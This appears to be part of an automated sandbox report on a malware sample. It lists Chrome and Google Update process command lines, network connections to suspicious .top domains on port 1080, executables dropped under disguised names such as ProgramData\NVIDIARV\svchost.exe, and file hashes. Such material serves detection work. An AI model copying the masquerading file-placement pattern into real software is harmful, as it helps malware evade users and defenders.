"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping …-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vZWRnZWRsLm1lLmd2dDEuY29tL2VkZ2VkbC9yZWxlYXNlMi9jaHJvbWUvYXUybjMyaDNobmNuYzVrY241Mnd4YXh6eGFfMTMzLjAuNjk0My4xMjcvMTMzLjAuNjk0My4xMjdfY2hyb21lX2luc3RhbGxlci5leGUiIGRvd25sb2FkZWQ9IjExODkyOTI2NCIgdG90YWw9IjExODkyOTI2NCIgZG93bmxvYWRfdGltZV9tcz0iMTczOTEiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5NjcwNyIgc291cmNlX3VybF9pbmRleD0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjcxOSIgZG93bmxvYWRfdGltZV9tcz0iMTg1MTUiIGRvd25sb2FkZWQ9IjExODkyOTI2NCIgdG90YWw9IjExODkyOTI2NCIgaW5zdGFsbF90aW1lX21zPSIzMDAxNiIvPjwvYXBwPjwvcmVxdWVzdD4

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe" -Embedding

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x200,0x224,0x228,0x1d0,0x22c,0x7ffd5aa4fff8,0x7ffd5aa50004,0x7ffd5aa50010

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2036,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2032 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1588,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2560 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2944,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2964,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3852,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3864 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3912,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3872 /prefetch:2

C:\Program Files\Google\Chrome\Application\133.0.6943.127\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.127\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4728,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4740 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3324,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5568,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5600 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5684,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5696 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5732,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5752 /prefetch:1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=508,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4024 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4012,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4236 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4244,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5680 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 a17.nbdsnb2.top udp
US 8.8.8.8:53 a17.yydsnb1.top udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.201.99:443 update.googleapis.com tcp
GB 216.58.201.99:443 update.googleapis.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 a17.nbdsnb2.top udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 a17.nbdsnb2.top udp
US 8.8.8.8:53 a17.nbdsnb2.top udp
GB 216.58.201.99:443 o.pki.goog tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com udp
NL 142.250.27.84:443 accounts.google.com udp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.201.99:443 update.googleapis.com tcp
US 8.8.8.8:53 play.google.com udp
N/A 224.0.0.251:5353 udp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 a17.nbdsnb2.top udp
US 8.8.8.8:53 a17.nbdsnb2.top udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 a17.nbdsnb2.top udp
GB 216.58.201.99:443 update.googleapis.com tcp

Files

C:\Windows\Installer\MSI94D8.tmp

C:\Windows\Installer\MSI97DA.tmp

C:\Config.Msi\e58947e.rbs

C:\ProgramData\setup\aa.exe

C:\ProgramData\setup\ddd

memory/3300-64-0x0000000000400000-0x0000000000510000-memory.dmp

C:\ProgramData\Packas\scrok.exe

memory/5088-68-0x00007FFD6DFD0000-0x00007FFD6DFD2000-memory.dmp

memory/5088-69-0x00007FF683160000-0x00007FF683719000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

memory/3800-75-0x0000000000010000-0x00000000000E6000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.xml

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TjNkNpAilaYvt.exe.log

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

\??\Volume{f821e193-0000-0000-0000-d08302000000}\System Volume Information\SPP\OnlineMetadataCache\{f5686bde-39e9-4f7b-8040-61c25c8dd766}_OnDiskSnapshotProp

\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

C:\ProgramData\Smart\setup.exe

memory/1140-114-0x00007FF683160000-0x00007FF683719000-memory.dmp

C:\ProgramData\setup\setup.exe

memory/4060-120-0x0000000000D90000-0x0000000000D91000-memory.dmp

memory/4060-121-0x0000000000400000-0x0000000000BA0000-memory.dmp

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe

C:\Windows\SystemTemp\GUMCB99.tmp\goopdate.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_zh-CN.dll

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdateCore.exe

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_es.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_fi.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_fa.dll

C:\ProgramData\NVIDIARV\svchost.exe

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_et.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_es-419.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_en-GB.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_en.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_el.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_de.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_da.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_cs.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ca.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_bn.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_bg.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ar.dll

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_am.dll

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdateComRegisterShell64.exe

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleCrashHandler64.exe

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleCrashHandler.exe

memory/3048-225-0x0000000000400000-0x000000000090B000-memory.dmp

memory/4696-222-0x0000000000400000-0x000000000090B000-memory.dmp

memory/3048-228-0x0000000010000000-0x000000001002D000-memory.dmp

memory/4696-233-0x0000000010000000-0x000000001002D000-memory.dmp

memory/472-242-0x0000000002A00000-0x0000000002C00000-memory.dmp

memory/472-241-0x0000000002A00000-0x0000000002C00000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
SHA512 cf4d1bc69591887d7023b826ab4d8e361e5c448a5036aa029dae5597521c438e8a9949d44a63a31780bef543617b2e4257bf1ca94afe7ff696166206cf3b6e81

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 0d0ed23ddf914e32a9900d01b981de3f
SHA1 c0235b6d571955d4e408b33fa3786d2add747464
SHA256 d914d97d40aced7300013fd46eda66cd583c923d57bcd8c6101339d93d660c8f
SHA512 4081812d9b196ae9f843c6999d83bb377e23c3d27c13460ea49353e706fc8121078635041b56233b9c06b6e0f9d849ce6f15dcef874ed7be739da82d115742ed

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 803bd80017c599fd55d8d0b3041b6bdc
SHA1 911505008fa5a0cc53ee6269e4b49bcb3a8d9fc6
SHA256 b6e42bb3d1614136703670565671ddeded53e18ed8ea50a6edc075ac4104fc64
SHA512 15d80b800f914e54ebcf54f204ea2fe605f632cdab61abbe02b6ee9f18bb2a9b0462288a5cc5901d0c3bd58446c8e9cbda944ce12900a811948980eb064f7ef6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 986d68f83c8fef14001018b6425e47a4
SHA1 8003a40bafcf012a7c190b6dfa39e94d26e31386
SHA256 d183fd30aa8dbeec3b64309fddd3ea7e9c9a0f549d08cb85597ba7a36cf16bc2
SHA512 2b8e403f281599520314913922512717d35d144a1dc44b4beabf462d847ece7d491c28cbb8908148b295bc8115f6ca3288f1be4cc1fa2db4e34c25cc9237c6e7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 d9d56a642aeadef9dbaeb7f0930c6770
SHA1 fb66e9b3dc083efed8211d9be732748c23502936
SHA256 32c3060e414ecfe1b65846a52505ae6ed0dbf57a82679f608ddfe454294aab1d
SHA512 f02fac0a848feb10384d8d399125e1d56263cea1b0ac267c73c02dbbb8d0976b66a02e28c8301a39ed3dee1ba76c40268888b0b02a4aeb6fe13b5a9257f20e70